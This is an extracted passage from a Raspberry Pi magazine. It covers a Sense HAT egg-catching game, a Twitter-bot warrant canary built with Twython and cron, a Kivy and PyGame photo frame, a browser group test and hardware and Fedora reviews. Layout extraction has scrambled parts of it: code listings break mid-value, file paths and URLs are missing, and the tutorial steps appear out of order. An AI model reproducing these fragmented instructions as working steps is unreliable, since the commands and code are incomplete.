    basket_x, = basket_move(pitch, basket_x)


Move the basket: part 2

Your program has now calculated the new position of the basket. Next, turn on the relevant LED and display the basket in its new position. On line 1, use the code sense.set_pixel(basket_x, 7, [139, 69, 19]) to set and turn on the LED; basket_x is the value calculated in the previous step using the function in steps 4 and 5. Add a short time delay to avoid over-reading the pitch, line 2. You now have a basket that you can move left and right.

Full code listing (cont.)

        '''Egg drop'''
        sense.set_pixel(basket_x, 7, [0, 0, 0])
        sense.set_pixel(egg_x, egg_y, [0, 0, 0])
        egg_y = egg_y + 1
        #print (egg_y)
        sense.set_pixel(egg_x, egg_y, [255,

sense.set_pixel(basket_x, 7, [139, 69, 19])
time.sleep(0.2)


Drop the egg: part 1

The egg is dropped from a random position from one of the LEDs across the top line. To make it appear to be dropping, first turn off the LED that represents the egg using the code sense.set_pixel(egg_x, egg_y, [0, 0, 0]). The values 0, 0, 0, refer to black and therefore no colour will be displayed; it will appear that the egg is no longer on the top line.

sense.set_pixel(egg_x, egg_y, [0, 0, 0])


Drop the egg: part 2

Since the egg drops downwards, you only need to update the y axis position. Do this on line 1 by updating the egg_y variable using the code egg_y = egg_y + 1, which means it will change from an initial value of zero to a new value of one. (The next time the ‘game loop’ runs, it will update to two and so on until the egg reaches the bottom of the matrix, a value of seven). Once the y position is updated, display the egg in its new position, using sense.set_pixel, line 2. The egg will appear to have dropped down one LED toward the bottom.

egg_y = egg_y + 1
sense.set_pixel(egg_x, egg_y, [255, 255, 0])
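As a quick sanity check, separate from the tutorial code, the fall can be simulated without a HAT at all: starting from y = 0, repeated '+ 1' updates walk the egg down to the bottom row, y = 7.

```python
# Simulate the egg's fall: each pass of the game loop adds one to
# egg_y until the egg reaches the bottom row of the 8x8 matrix.

egg_y = 0
path = [egg_y]
while egg_y < 7:
    egg_y = egg_y + 1
    path.append(egg_y)

print(path)  # [0, 1, 2, 3, 4, 5, 6, 7]
```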

        255, 0])
        '''Check position of the egg and basket x, y'''
        if (egg_y == 7) and (basket_x == egg_x or basket_x-1 == egg_x):
            sense.show_message("1up", text_colour = [0, 255, 0])
            sense.set_pixel(egg_x, egg_y, [0, 0, 0]) #hides old egg
            egg_x = random.randrange(0,7)
            score = score + 1
            egg_y = 0
        elif egg_y == 7:
            sense.show_message("Game Over", text_colour = [255, 38, 0])
            return score
            game_over = True
            break

main()
time.sleep(1)
sense.clear()
sense.show_message("You Scored " + str(score), text_colour = [128, 45, 255], scroll_speed = 0.08)


egg_x = random.randrange(0,7)
score = score + 1
egg_y = 0


What happens if you miss the egg?

If you miss the egg, then the game ends. Create a conditional to check whether the egg's y position has reached the bottom row, number 7, line 1. Display a message that states that the game is over, line 2, and then return the value of the score, which is displayed across the LED matrix in step 23.


elif egg_y == 7:
    sense.show_message("Game Over", text_colour = [255, 38, 0])
    return score

Did you catch the egg?

At this stage in the tutorial, you have a falling egg and a basket that you can move left and right as you tilt the Sense HAT. The purpose of the game is to catch the egg in the basket, so create a line of code to check that this has happened, line 1. This checks that the egg is at the bottom of the LED matrix, ie in position 7, and that the basket’s x position is the same value as the egg’s x position. This means that the egg and the basket are both located in the same place and therefore you have caught the egg.

if (egg_y == 7) and (basket_x == egg_x or basket_x-1 == egg_x ):
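Pulled out of the game loop, the catch test can be tried on its own. This is just a sketch of the condition above as a pure function (the name egg_caught is ours): the egg is caught when it has reached the bottom row and the basket sits on, or one LED to the right of, the egg's column.

```python
# The catch condition from the game, as a standalone function:
# egg at the bottom row (y == 7) and basket on, or one LED right of,
# the egg's column.

def egg_caught(egg_x, egg_y, basket_x):
    return egg_y == 7 and (basket_x == egg_x or basket_x - 1 == egg_x)

print(egg_caught(3, 7, 3))  # directly under the egg: True
print(egg_caught(3, 7, 4))  # one LED to the right still counts: True
print(egg_caught(3, 6, 3))  # egg still falling: False
```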



If you catch the egg in the basket, then you gain one point. Notify the player by scrolling a message across the LEDs using sense.show_message, line 1. Write your own message and select a colour. Since you have caught the egg, it should disappear as it is in the basket; to do this, set the 'egg' pixel to a colour value of 0, 0, 0. This basically turns off the egg LED, making the egg disappear. Note that these lines are both indented.

sense.show_message("1up", text_colour = [0, 255, 0])
sense.set_pixel(egg_x, egg_y, [0, 0, 0])


Set up for the next round

Since you caught the egg, you get to play the game again. Set a new egg to drop from a random x position on the LED matrix, line 1. Update your score by one point and then set the egg’s y position to 0, line 3. This ensures that the egg is back at the very top of the LED matrix before it starts dropping.



Stop the game

Since the game is over, change the game_over variable to True, which stops the game loop from running again and then runs the last line of the program.

game_over = True
break


Start the game

The main instructions and game mechanics are stored in one function called main(), which holds most of the game structure and processes. Functions are located at the start of a program to ensure that they are loaded first, ready for the program to use. To start the game, simply call the function (line 1), add a small delay (line 2), and ensure all the LEDs are set to off before the game starts (line 3).

main()
time.sleep(1)
sense.clear()


Display your final score

If you did not catch the egg, then the game is over and your score is scrolled across the LEDs. This uses the line sense.show_message and then pulls the value from the global score variable; convert this value into a string using str, line 1. Your program is now completed; save the file and then press F5 on the keyboard to run it. After the opening image and message are displayed, the countdown will begin and the game will start. Can you catch the egg?

sense.show_message("You Scored " + str(score), text_colour = [128, 45, 255], scroll_speed = 0.08)


Make a Raspberry Pi-based warrant canary

Protect yourself from Orwellian gagging orders and secret warrants with your own warrant canary


Nate Drake

(@natewriter) is a freelance tech journalist specialising in cyber security. He decided to use Twitter for his own warrant canary after watching hours of cartoons.

What you’ll need ■ Suitable for all models of Raspberry Pi

The warrant canary borrows its name from the unfortunate bird that was taken down mine shafts. It's a reaction against secret requests to obtain customers' personal data. For example, when a court order is served on a business, its owners are forbidden from alerting users that their data has been compromised. Warrant canaries cleverly slalom around this legal hurdle by regularly making a statement that they have not been subject to such a request. If they switch off their warrant canary, as Reddit did in March 2016, users will know that an external agency also has access to the data a company stores about them. The legal ramifications of this are complex and depend on where you are in the world; this tutorial is an exercise in proof-of-concept only. For this tutorial we will use the Raspberry Pi along with a dedicated Twitter bot to build your own warrant canary.

Left Use a valid e-mail address and phone number to create a new account


Create a Twitter account

Head to Twitter and create a new account. You will need a valid e-mail address and mobile phone number. If you already have a Twitter account, make sure to add a phone number, as this is required in order to use a Twitter bot. See https:// for help with this.

Left If possible leave this page open, as you’ll need the API Keys and Access Tokens shortly


Create your Access Token

Click on Keys and Access Tokens. Make a note of your API keys. Next, scroll to Token Actions and click Create My Access Token. Write down the Access Token and the Access Token secret. Your Raspberry Pi will need this information in order to be able to connect securely to Twitter later.

Left Click Edit Profile to amend your details. Confirm your e-mail address before proceeding


Tweak profile

Optionally at this stage you can choose to delete your mobile phone number from Twitter. It is only required once in order to deter spammers. Feel free at this stage to add a profile picture to your account and update the bio to explain what your warrant canary is for.


Left Fill in Name, Description and Website. The other fields can be left blank


Create the application

Once your account is set up, go to http://apps.twitter.com and click Create New Application to begin setting up a dedicated bot for your warrant canary. Under 'personal website', enter the URL of your Twitter channel. Tick to say you've read and agreed to the developer agreement, then click Create your Twitter Application.


Twitter has strict safeguards against spam bots. This is why it requires accounts using Applications to be verified by SMS. You may notice when testing your script that Twitter will also not allow duplicate statuses. Make sure that your tweets are well spaced apart. The above tutorial will have your Pi's canary tweet every day at midnight. If you need them to be closer together, the raspberrypi.org website has some tips on using Twython to post messages at random from a list.
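Another way around the duplicate-status rule, sketched below rather than taken from the tutorial, is to fold the current date into the canary text so that each day's tweet is unique. The function name and wording here are illustrative.

```python
# Sketch: make each daily canary tweet unique by including the date,
# so Twitter's duplicate-status filter never rejects it.
import datetime

def canary_text(today=None):
    today = today or datetime.date.today()
    return ("I have not been subject to any government gagging orders "
            "and/or subpoenas as of %s." % today.isoformat())

print(canary_text(datetime.date(2017, 1, 9)))
```

You would then pass the result to api.update_status() in place of the fixed tweetStr.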

ARE WARRANT CANARIES LEGAL?

Left Twython is a Python wrapper for Twitter's API


Install software on the Pi

Open Terminal on your Pi or connect via SSH. Run…

sudo apt-get update
sudo apt-get upgrade

…to update Raspbian. Next run:

sudo pip install twython requests requests_oauthlib

The legal loophole that warrant canaries supposedly exploit has yet to be tested. In 2015 Australia outlawed them altogether and other countries may follow suit, threatening punishment if the canary isn’t maintained. Prosecution would be difficult however without revealing the existence of the very information the original warrant was designed to suppress in open court. It’s fine to make one as a proof of concept, but you’ll need to research to find out if actually using one as an injunction warning system is legal where you are.

…to install all necessary software.


Create the Python script

In the Pi Terminal, run the command…

Left When entering the keys, make sure there are no spaces inside the quote marks


…to create your script. Next paste in the following:

#!/usr/bin/env python
import sys
from twython import Twython

Left This command sets the canary to tweet every day at midnight. See for more options

If this is the first time you’ve run crontab, choose option 2 to select an editor. Scroll to the bottom and paste the following:

0 0 * * * /usr/bin/python /home/pi/

The rest of the script to paste in, continuing Step 6, is:

tweetStr = "I have not been subject to any government gagging orders and/or subpoenas at the time of this Tweet."

# Insert your API keys and access tokens here
apiKey = 'yourapikey'
apiSecret = 'yourapisecret'
accessToken = 'youraccesstoken'
accessTokenSecret = 'youraccesstokensecret'

api = Twython(apiKey, apiSecret, accessToken, accessTokenSecret)
api.update_status(status=tweetStr)
print "Tweeted: " + tweetStr

Left Use the hash (#) symbol to comment out the line starting “tweetStr”


Add a photo to your Tweets (optional)

Run

sudo nano

Replace "yourapikey" and so on with the actual values from the page. Press Ctrl+X, then Y, then Return to save and exit.


Test the script


Run this command…


Left Double-check that the tweet has been sent by visiting your Twitter channel

…to test the script. If successful it will display a message saying that the Tweet has been sent.


…to edit your Python script. Comment out the line beginning “tweetStr”, then replace the lines…

Schedule your canary

The warrant canary should be set to tweet daily unless you intervene. In the Pi terminal run the following…

sudo crontab -e

print "Tweeted: " + tweetStr

…with:

message = "No FBI here!"
with open('/home/pi/Downloads/image.jpg', 'rb') as photo:
    api.update_status_with_media(status=message, media=photo)
print "Tweeted: " + message


Python column

A Raspberry Pi photo frame

With some Python code and a nice display screen, you can turn your Raspberry Pi into a very nice photo frame

Joey Bernard

Joey Bernard is a true Renaissance man, splitting his time between building furniture, helping researchers with scientific computing problems and writing Android apps

In a previous article, we looked at using Kivy as a cross-platform graphical interface framework that you can use with your Raspberry Pi. Unfortunately, we did not have the room to really look at any possible uses. This issue, we will look at one possible use: displaying photos on some kind of display. This might be something you do at home, with family pictures, or it could be a slideshow for a business or event. If you didn't get a chance to read the previous article, that is okay. We will review enough of the basics that you should be able to get off to a running start now.

You will obviously need a physical display attached to your Raspberry Pi to show the images on. There are several options available, such as the official 7-inch touch screen. You can also use anything that accepts HDMI as input. You will also need your Raspberry Pi to start up the X11 server when it boots up. By default, Raspbian should do this. But, if you have disabled the X11 server and only use the console, you will need to either re-enable the desktop or just reinstall the OS to have a clean start.

The first step is to be sure that the Kivy packages are installed on your Raspberry Pi. If you are running Raspbian, you can do this with the command

sudo apt-get install python-kivy python-kivy-examples

(If the packages are not available, you can instead run sudo pip install kivy.) This also installs a collection of good examples that you can use as jumping-off points for further projects. With Kivy, you subclass the App class to create the graphical interface. The commented section of this core code is where we will need to put all of the Python code that does the work of loading images and displaying them.

"You subclass the App class to create the graphical interface"

Why Python? It's the official language of the Raspberry Pi. Read the docs at

The first step is to get the list of image files to use as part of the photo frame. There are several different ways you could do this. If you wanted to simply use all of the images within a subdirectory, you could create the list with the code here:

# get all images in a subdirectory
current_dir = dirname(__file__)
filelist = glob(join(current_dir, 'images', '*'))

This pulls all of the files in the subdirectory named 'images'. If your images are scattered around your filesystem, it might be better to use a text file containing the locations for each of the files you want to use. In this case, you would want to use the following code:

in_file = open('filelist.txt')
temp = in_file.readlines()
in_file.close()
filelist = []
for line in temp:
    filelist.append(line.strip())

We need to use the strip method because the readlines method of the file object includes the newline character at the end of each line. We need to remove these before we can use them later on when we go to load the images. The next step is to actually display the images. The simplest method is to just pop them up on the screen, one at a time. But this is a bit boring. Instead, we could use the available Carousel object to handle transitioning the images from one to another. The following code shows how to create this type of display:

import kivy
from kivy.app import App
from kivy.uix.image import Image

from kivy.uix.carousel import Carousel
from kivy.clock import Clock

class PhotoFrameApp(App):
    carousel = Carousel(direction='right', loop='true')

    def my_callback(self, dt):
        self.carousel.load_next()

    def build(self):
        # Use the filelist generation method of choice
        for curr_image in filelist:
            image = Image(source=curr_image)
            self.carousel.add_widget(image)
        Clock.schedule_interval(self.my_callback, 2.5)
        return self.carousel

if __name__ == '__main__':
    PhotoFrameApp().run()

In the previous code, the carousel object was set to loop. This means that when you reach the end of the list of images, it will simply loop back around to the beginning of the list, continuing forever. The next portion defines the callback for the updating of the carousel. It simply calls the 'load_next()' method of the carousel to pull up the next image on the list. In the 'build()' method, the first step is to create the list of image filenames. You could use either of the methods suggested earlier, or one of your own devising. Once you have that list, you can loop through each of them and create a new Image object for each of them. These new Image objects are added to the carousel with the 'add_widget()' method. The last step in the 'build()' method is to create a schedule using the Clock object. Using the 'schedule_interval()' method, this code will change the image every 2.5 seconds. This method is good as a first start, but what if you want a more interesting transition between images? This can be done by using another set of classes called Screen and ScreenManager. If your list of images don't take up too much RAM, you can simply create a new Screen object

for each image. The following code is an example of how you could do this:

import kivy
from kivy.app import App
from kivy.uix.image import Image
from kivy.uix.screenmanager import Screen, ScreenManager, FadeTransition
from kivy.clock import Clock

class PhotoFrameApp(App):
    sm = ScreenManager(transition=FadeTransition())
    curr_screen = 0
    num_screens = 0

    def my_callback(self, dt):
        self.sm.current = str(self.curr_screen)
        if self.curr_screen == self.num_screens - 1:
            self.curr_screen = 0
        else:
            self.curr_screen = self.curr_screen + 1

    def build(self):
        # Create the list of files in list filelist
        self.num_screens = len(filelist)
        for i in range(self.num_screens):
            image = Image(source=filelist[i])
            screen = Screen(name=str(i))
            screen.add_widget(image)
            self.sm.add_widget(screen)
        Clock.schedule_interval(self.my_callback, 2.5)
        return self.sm

if __name__ == '__main__':
    PhotoFrameApp().run()

As you can see, there is a bit more involved in creating the screens and adding the images than in the previous example. When you loop through the list of image files, you need to create a new Image widget. You then create a new Screen widget and add the Image widget as a child. The last step is that you need to add the new Screen widget to the ScreenManager object that was created at the top of the class. We reuse the 'schedule_interval()' method to

have the screens transitioning every 2.5 seconds. The callback function needs to be changed, though. The ScreenManager has an attribute, named 'current', that identifies which screen is the one being displayed. When you change what is identified by the current attribute, the two images are changed using the transition method that was defined when you created the ScreenManager object. If you are using the latest version of Kivy, there is a new method available, called 'switch_to()'. In this case, you don't need to add the Screen objects as widgets to the ScreenManager object. The 'switch_to()' method removes the current displayed screen and adds the new screen, applying the transition method being used. The version of Kivy available in the Raspbian package repository is older, so we've used the older method for managing screens. The previous example used the FadeTransition method to move from one screen to another. The other transitions available are, variously, NoTransition, SlideTransition, SwapTransition, WipeTransition, FallOutTransition and RiseInTransition. If you want to have even more variety in your image display, you can change the transition method for each image change by changing the attribute 'transition' for the ScreenManager object. This code only displays the images, but that isn't the only thing you can do. You could also create an interactive photo frame that you can use to manipulate the pictures, if you have a touch screen as the display. As the code is written above, you can swipe back and forth to display other images. If you remove the 'Clock.schedule_interval()' command, then the image display will stay static unless you swipe to change the image being displayed. Also, there is a widget, called 'Scatter', that you can load the picture into before adding to the screen objects. The Scatter class allows you to use multi-touch to rotate the image, stretch it or shrink it.
This might be handy if you wanted to create a photo album application rather than a photo frame display. Hopefully, this has sparked some interest in looking at what can be done with such a powerful framework.
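Incidentally, the wrap-around logic used in 'my_callback()' — reset to zero after the last image, otherwise increment — boils down to modular arithmetic. A tiny standalone sketch (the 'next_index' helper is our own name, not part of Kivy):

```python
def next_index(current, count):
    """Advance to the next image index, wrapping back to 0 after the last one."""
    return (current + 1) % count

# Cycling through three images: 0 -> 1 -> 2 -> 0
assert next_index(0, 3) == 1
assert next_index(2, 3) == 0
```

The same one-liner works for any slideshow loop, including the PyGame version of this project.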

Can you use PyGame instead?

Of course, Kivy is not the only framework that you could use to create this image display. As another example, we will look at how you could use PyGame to do a similar job of showing a series of photos on a Raspberry Pi display.

import pygame

pygame.init()
display_width = 800
display_height = 600
gameDisplay = pygame.display.set_mode((display_width, display_height))
black = (0, 0, 0)
white = (255, 255, 255)
clock = pygame.time.Clock()
# Create the filelist image list
def img_swap(x):
    gameDisplay.blit(filelist[x], (0,0))
finished = False
x = 0
while not finished:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            finished = True
    gameDisplay.fill(white)
    img_swap(x)
    pygame.display.update()
    if x == len(filelist) - 1:
        x = 0
    else:
        x = x + 1
    clock.tick(0.4)  # limit to one frame every 2.5 seconds
pygame.quit()
quit()

As you can see, this code is a bit more low-level. The commented line is where you would place the code that creates the list, named 'filelist', holding the loaded images (pygame Surfaces, not just filenames) for all of the pictures that you wanted to use as part of the display. Displaying the image is a two-step process. You first need to fill the window with white to essentially erase the currently displayed image. Then the function 'img_swap()' uses the 'blit()' method to copy the image data to the physical display. Again, to keep the code simple, we used (0,0) as the origin to start the drawing of the image. But this means that all of the images are displayed in the top left-hand corner. You would probably want to add code to the function in order to figure out the coordinates to use as an origin to put your image in the centre of the window. PyGame also has a clock object that you can use to trigger the swapping of the images on a regular schedule.
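That centring calculation is simple arithmetic. Here is a hedged sketch; the 'centred_origin' helper is our own name, and the sizes in the example are purely illustrative:

```python
def centred_origin(display_size, image_size):
    """Return the (x, y) blit origin that centres an image in the window."""
    dw, dh = display_size
    iw, ih = image_size
    return ((dw - iw) // 2, (dh - ih) // 2)

# An 800x600 window with a 400x300 image gives an origin of (200, 150).
assert centred_origin((800, 600), (400, 300)) == (200, 150)
```

You could then blit with gameDisplay.blit(filelist[x], centred_origin((display_width, display_height), filelist[x].get_size())), using pygame's standard Surface.get_size() method.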


From the makers of

The Python Book

Discover this exciting and versatile programming language with The Python Book. You’ll find a complete guide for new programmers, great projects designed to build your knowledge, and tips on how to use Python with the Raspberry Pi – everything you need to master Python.

Also available…

A world of content at your fingertips Whether you love gaming, history, animals, photography, Photoshop, sci-fi or anything in between, every magazine and bookazine from Imagine Publishing is packed with expert advice and fascinating facts.


Print edition available at Digital edition available at

Group test | Solwise PL-1200AV2 | Fedora 25 | Free software






Web browsers

Is Chrome still the cream of the crop when it comes to modern, open-source web browsing?




Midori is considered one of the fastest, most cutting-edge browsers out there, offering users the latest web tech and an extension system to help make the browser their own. It’s comparable to Chrome in a lot of ways, but does it do enough to step out of its shadow?

The continuous developments behind Chrome have helped it become one of the biggest and most widely used web browsers today. Combining simplicity with usability has been at the heart of its growth, but it’s also helped propel its competition to improve dramatically as well.


One of the reasons Firefox’s reputation continues to grow is its customisation offerings. Many parts of the browser can be tailored to suit your needs, and because of it, there have been some fantastic spin-off products made. Can it claim top spot in this group test, however?

QupZilla introduces some interesting concepts. It uses a unified library mode, helping keep your bookmarks, history and RSS feeds in a single window. Plus, with AdBlock integrated as standard, could QupZilla cause an upset for its bigger rivals?



Web browsers



Lightweight, fast and always on the cutting edge of web developments

Is the king of browsers still managing to hold on to its crown?

■ Midori will work with a vast selection of search engines, with an installer on hand to help you switch when necessary

■ Extensions vary in their use, with some acting as standalone functions and others offering links to current apps

Browser design

The coding behind Midori is fantastic, giving it a beautiful design throughout. Everything from bookmarks to tabs is controlled through a single menu, so you won’t find any complex windows to navigate through. Best of all, its design carries through each and every Linux distribution, so you’re guaranteed the same experience every time.

From the outset, Chrome looks like a relatively minimal browser, utilising a single bookmark manager as its standout feature. One caveat is that it does get a little complicated when you start digging through its menu systems, of which there are many. You’ll find everything you could need for a good browsing experience buried here, however.

Web performance

Speed is of the essence, and we’d go on record and say Midori is faster than Chrome. At its core is a lightweight WebKit rendering engine, which makes loading speeds lightning-quick. It’s even above average for image- and video-heavy webpages, so it’s a great all-rounder. Midori really shows off the benefits of what a lightweight design can do for performance.

Having the power of Google behind it has helped Chrome tremendously. Whatever you throw at it is handled with the utmost ease, no matter the media content within. What’s particularly enjoyable about using Chrome is how it deals with older websites, performing on-the-spot checks for corrupt code and altering the loading process to cater for it.

Management and settings

Many of Midori’s core settings are ideal for tailoring privacy, but there’s little on offer for browser security. It’s an annoyance, but it would counteract the browser’s lightweight build. We did like, however, Midori’s bookmarking suite, which can be used to tailor for different site combinations and even create a quick load list.

Chrome has one of the best bookmark management tabs out there, enabling them to be integrated throughout your desktop and beyond. Alongside that, its History tab is packed with great features to help manage previously visited sites with ease, and even export them if needed. The amount of choice on offer is a bit overwhelming for new users, however.

Plugins and extras

One of the better extras on offer in Midori is its built-in downloader, a perfect accompaniment when it comes to on-the-spot file downloads. It can be a little clunky with media files, but it’s a small issue. Other extras are minimal in choice, but both the RSS feed manager and spell checker are helpful additions for most users. There’s room for more options here, however.

We’d say that part of Chrome’s appeal is through its experimental feature page. There are a lot of developmental features here that can be integrated into your browser. Of course, some of them can make your browser unusable, but some are fantastic additions. Away from that, Chrome’s Web Store has some impressive tools that can also be implemented into the browser.



Midori burns up the rest of the field when it comes to its speed, and while a few options are missing, this is a lightweight browser that seriously challenges Chrome’s crown in most areas.



Chrome still remains one of the best browsers out there. With the Google juggernaut behind it, updates are thick and fast, keeping up to date with the latest must-have web trends.



Mozilla’s browser continues to make waves in its field


Fairly new on the scene, does QupZilla deliver a great browsing experience?

■ Add-ons allow you to customise how some of the core functions within Firefox actually work. They vary in their success and usability

■ Native ad-block support is great and even better is that users can configure the blocker to their exact tastes and requirements

Browser design

Out of all the browsers featured here, Firefox takes the most time to get used to. That’s not to say it’s bad by any means, but a lot of core tools are in different locations than some users would normally think to look for them. However, several of the browser’s key components can be customised, which is a big plus when compared to the competition.

QupZilla’s core design utilises many elements from some of the other browsers featured here. That’s not a bad thing by any means, but it’s hard to pinpoint the areas that really help make it stand out from the crowd. The minimal design is easy to navigate, menu systems are easy to identify and tools are labelled correctly. We just wish there was some more originality here.

Web performance

Firefox’s performance is generally impressive, but it can feel a little sluggish at times. The crux of this issue usually stems from the plugin menu, which you’ll need to keep a close eye on. Despite this, Mozilla’s backing does help Firefox’s reputation as one of the more file-friendly browsers out there, so integrating your day-to-day life with the web is easier than you might think.

Browsing the web is a pleasure with QupZilla, with loading speeds not hindered by pointless animations and other superfluous extras. What we would recommend, however, is that you avoid the custom theme library, as we found some issues with the browser crashing when we looked to implement one of them. Apart from that, all is good here.

Management and settings

Managing your various social accounts through one menu within Firefox is a particular highlight, and we wish it was something that other browsers looked to implement into their offerings. Settings choices aren’t as fully featured as those that Chrome offers, which we do actually prefer, but those wanting to experiment with their browser may be left disappointed.

QupZilla unifies bookmarks, history and RSS feeds into one place, doing away with multiple windows. For end users, it proves to be a helpful addition, allowing complete control of the ins and outs of the browser in one place. Another nice addition is the ability to import bookmarks from other browsers, despite it being a little buggy at times.

Plugins and extras

Firefox offers its Private Browsing with Tracking Protection combo as a one-stop tool to help you browse the web anonymously, and in practice, it works an absolute treat. We also really liked its intelligent search system that looks to utilise its knowledge of your searches and site visits to recommend things that you may want to view and read.

There aren’t too many extras to speak of in QupZilla, but a couple do shine through. Integrated ad-blocking software is a headline feature of the browser, enabling users to identify the sites they’d like to prevent displaying adverts. There’s also a self-styled ‘speed dial’ that can be used to load webpages faster, but again, it was a little buggy during testing.



A lot of Firefox’s extras will be a big incentive for users to check it out, and rightly so. It does miss some core settings we’d like to have seen, but this is still a highly usable browser.


Despite some positives, QupZilla still has some annoyances in other areas. We must point out that this is still a growing project, and we recommend paying close attention to it over the coming months.



Web browsers

In brief: compare and contrast our verdicts

Midori
Browser design: A crisp and clean design carries through well on a host of Linux distributions
Web performance: Capable of fast loading times thanks to its lightweight build qualities
Management and settings: Tailored for privacy, but lacking in core browser security for the most part
Plugins and extras: Lacking in certain options, but a built-in downloader is a great added bonus
Overall: A few omissions here and there, but this is the closest Chrome beater we’ve found

Chrome
Browser design: Minimal from the outset, but overly complicated when digging through the settings
Web performance: Deals with any task with consummate ease, especially older websites that lack advanced code
Management and settings: Chrome sports one of the best bookmark and history management windows out there
Plugins and extras: Hundreds of experimental features are on hand so you can experiment with Chrome’s capabilities
Overall: The gap between Chrome and other browsers is getting smaller, but it’s still the king here

Firefox
Browser design: Its design is a little different from the rest, which can take a little time to get accustomed to
Web performance: While integrating files into Firefox is simple, it can feel a little sluggish from time to time
Management and settings: Settings are more refined than other browsers, with only the best options showcased
Plugins and extras: A handy Private Browsing and Tracking Protection combo is a particular highlight here
Overall: Firefox is a solid alternative to Chrome, but we do prefer what Midori offers

QupZilla
Browser design: A blend of other browser features helps give QupZilla a good look overall
Web performance: Browsing speeds are fast, as long as you avoid the slowdown-ridden custom themes
Management and settings: QupZilla unifies your bookmarks, RSS feed and web history in one manageable menu
Plugins and extras: Integrated ad-blocking software is useful, but you can find extensions that are better
Overall: A functional browser that’s missing the wow factor that other browsers have



Yes, Chrome is still the best browser around, but it’s nowhere near as superior as it once was. One of the best things about doing this group test was being able to see first-hand how major developments in opposing browsers are quickly closing the gap on Google’s juggernaut. Midori was a particular highlight, offering a relatively minimal take on the browsing experience, while still boasting an impressive suite of features and quick loading times. We’d love to revisit this group in six months and see if anything has changed.

As it stands, Chrome still sits at the top of the pile. While its core browsing experience isn’t anything out of this world, it’s the embedded extras that really set it apart. For one, the Chrome Web Store has come on in leaps and bounds in recent years, with thousands of extensions now available for users to expand on their Chrome experience. Best of all, many of these are completely free and offer quick links to some of your most used apps.

Similarly, for budding tinkerers out there, the experimental features menu remains a hidden treasure trove. While many of these features aren’t yet ready for public consumption, some can be integrated into the browser with absolute ease.


■ Implement extensions to improve and expand on your current Chrome experience

What’s even better is that some of these can be edited and tailored to your own Chrome download, so the choice is really down to you. Chrome has held off against some stiff competition in its time, and it’s testament to the continued support from Google that it remains at the top. Frequent updates are helping plug any holes, while a growing community is helping to provide instant feedback and bug reports when needed. Midori is a worthy runner-up, but it’ll take some doing to dethrone the king. Oliver Hill



Solwise PL-1200AV2-PIGGY


Faster and more reliable than Wi-Fi, this advanced Powerline adaptor is ideal for 4K streaming


£47 each



Qualcomm Atheros QCA7500 chipset
Pass-through socket with noise filter
128-bit AES Link Encryption


Home networks are facing growing demands as 4K media streaming home servers, games consoles and an ever-increasing number of internet-connected devices become commonplace, while our walls stay as thick as ever. While AC Wi-Fi routers offer one way to bolster signal, and Ethernet cables are there for those that want to snake cables through their houses, Powerline adaptors offer a third way. For those unfamiliar with Powerline (also known as HomePlug), this technology turns your home’s electrical wiring into a network, transmitting data packets through the higher frequencies your wires support and your 50/60Hz electrical power isn’t using.

Solwise’s PL-1200AV2-PIGGY Powerline adaptor is up there, promising Gigabit speeds with transfer rates up to 1200Mbps. During our speed tests, we found the adaptor didn’t quite live up to these grand claims, but still managed to trounce our home Wi-Fi, with setup that couldn’t be simpler. The PL-1200AV2 uses the latest Qualcomm Atheros QCA7500 chipset, designed specifically for Powerlines, and offers enhanced processing power, employing MIMO (multiple input multiple output), which offers eight spatial streams, the same as an AC router. This means it has much more spectral bandwidth to play around with, which

Pros Easy to set up and pair, it boasts some high-end features for a reasonable price and delivers impressive performance

allows it to deliver larger data streams, making it ideal for 4K Netflix. The PL-1200AV2 also has two Gigabit Ethernet ports, so that you can run multiple devices off the one adaptor. These are located on the bottom of the adaptor, which is arguably more aesthetically pleasing, but isn’t quite as easy to access. Unlike some Powerline accessories, this adaptor also has a pass-through socket, so you can continue to use it as a power source (apparently, this is the source of the ‘PIGGY’ name; it’s like ‘piggyback’). The pass-through socket is also filtered to help reduce mains noise, if that’s something that bugs you. Of more significance, though, the PL-1200AV2’s security is supported by 128-bit AES Link Encryption to keep out eavesdroppers and hackers. However, while some similarly priced Powerline adaptors, including models from Devolo and TP-Link, include a Wi-Fi transmitter so you can create a hotspot around your socket, this is a feature sadly lacking from the PL-1200AV2.

Setting up the PL-1200AV2 is almost a case of plug-and-play thanks to the QuickConnect button. Like any Powerline network, you require at least two adaptors (so expect to pay £94 to start using the PL-1200AV2, rather

than just £47). Plug one into the socket nearest your router, which you can then hook up to the internet using one of the Ethernet ports. Place your second adaptor anywhere in your house where you will need reliable internet. Then you have the option to use Solwise’s free installation software to set up a network, but it’s much easier to just press the button on the PL-1200AV2 to pair them and watch the LEDs flicker to confirm it.

As we said, in terms of actual performance, our speed test results were nothing like the 1,200Mbps promised on the box. We didn’t actually expect this, as that’s a theoretical max speed only. The reality was 385Mbps, which we still consider impressive when compared to the 20 to 90Mbps Powerline tech was offering just a couple of years ago. The max ping was 3ms, which will no doubt appeal to online gamers. The PL-1200AV2 also uses enhanced Quality of Service (QoS), so it will prioritise bandwidth for multimedia payloads – like online gaming, 4K TV and VoIP calls – for smoother streaming. However, the advantage of Powerline is not really speed, but distance. You can use one PL-1200AV2 adaptor on your ground floor and another in your attic without worrying about loss of signal. Jack Parsons

Cons In our tests, it didn’t deliver anywhere near the maximum 1,200Mbps speed. You’ll also need to shell out for at least two adaptors for it to work

Summary While it doesn’t live up to its name’s claim, the Solwise PL-1200AV2-PIGGY delivers near 400Mbps speeds that are still incredibly impressive. It’s also almost a third of the price of many Gigabit Powerline adaptors, while still offering high-quality features, including its Atheros chipset, added encryption and enhanced QoS.




Fedora 25



Can Fedora’s latest update turn the tables on the competition?


Storage 10GB drive space (20GB recommended)

Specs 1GHz processor (1.4GHz recommended)


For many users coming over to Linux for the first time, Fedora has been one of the leading lights to help guide them on their path. Renowned for being highly usable and boasting a fantastic community, continuous developments have helped propel it to become one of the premier offerings available for download. Its latest release, Fedora 25, blends together a suite of new features, mixed in with some improvements to help core stability as well. As ever, Fedora has released three editions of the distribution, each tailored to a specific use and

stemming from a base package. Fedora 25 Atomic Host (replacing Cloud), Server and Workstation have all had some noticeable enhancements. Each edition has an underlying foundation of features that they all use in their own way. One of these inclusions is Docker 1.12 integration, which finally makes the transition across to Fedora. It’s an ideal solution for building and running container-based applications, and benefits from the low-resource build of each edition of Fedora. One of the issues in previous versions of Fedora was its

sometimes problematic system programming language, but we’re glad to say this is a thing of the past thanks to the inclusion of Rust. Albeit not overly well-known, Rust’s integration helps eradicate the stability issues faced previously; another welcome addition, we must say.

